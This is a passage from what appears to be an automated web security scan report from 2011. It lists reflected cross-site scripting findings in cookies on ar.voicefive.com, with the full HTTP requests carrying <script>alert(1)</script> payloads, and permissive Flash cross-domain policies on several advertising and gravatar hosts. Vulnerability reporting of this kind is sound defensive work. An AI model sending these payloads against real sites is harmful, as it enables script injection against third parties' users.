ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
9:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&1e2f5<script>alert(1)</script>aaffd4b4831' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1308010656";COMSCORE.BMX.Buddy.start(({"Config":{"ControlList":[{Pid:"p79727471",RecruitFrequency:0,Inv:"mtv_300x250",Version:3}],"MasterSettings":{"GlobalCook
...[SNIP]...

3.70. http://ar.voicefive.com/bmx3/node.pli [ar_p82806590 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 17aab<script>alert(1)</script>be6c6e68589 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&17aab<script>alert(1)</script>be6c6e68589; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&17aab<script>alert(1)</script>be6c6e68589', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:
...[SNIP]...

3.71. http://ar.voicefive.com/bmx3/node.pli [ar_p84552060 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 5ba0f<script>alert(1)</script>1268b518d38 was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&5ba0f<script>alert(1)</script>1268b518d38; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&5ba0f<script>alert(1)</script>1268b518d38', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2
...[SNIP]...

3.72. http://ar.voicefive.com/bmx3/node.pli [ar_p91143664 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p91143664 cookie is copied into the HTML document as plain text between tags. The payload 6f37c<script>alert(1)</script>327ede0648b was submitted in the ar_p91143664 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&6f37c<script>alert(1)</script>327ede0648b; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&6f37c<script>alert(1)</script>327ede0648b', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1308010653";COMSCORE.BMX.Budd
...[SNIP]...

3.73. http://ar.voicefive.com/bmx3/node.pli [ar_p97174789 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 1a430<script>alert(1)</script>0390c9245 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&1a430<script>alert(1)</script>0390c9245; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16066

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&1a430<script>alert(1)</script>0390c9245', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:3
...[SNIP]...

3.74. http://ar.voicefive.com/bmx3/node.pli [ar_p97464717 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p97464717 cookie is copied into the HTML document as plain text between tags. The payload 1ffeb<script>alert(1)</script>61108d79055 was submitted in the ar_p97464717 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&1ffeb<script>alert(1)</script>61108d79055; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
nReady.onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Buddy.cookies={ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&1ffeb<script>alert(1)</script>61108d79055', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14
...[SNIP]...

4. Flash cross-domain policy
There are 77 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://0.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:20:45 GMT
Expires: Tue, 14 Jun 2011 00:25:45 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://1.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:20:43 GMT
Expires: Tue, 14 Jun 2011 00:25:43 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://2.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://2.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 2.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:30:12 GMT
Expires: Tue, 14 Jun 2011 00:35:12 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.4. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.5. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Mon, 13 Jun 2011 14:11:24 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.6. http://ads.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:1722"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.7. http://ar.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

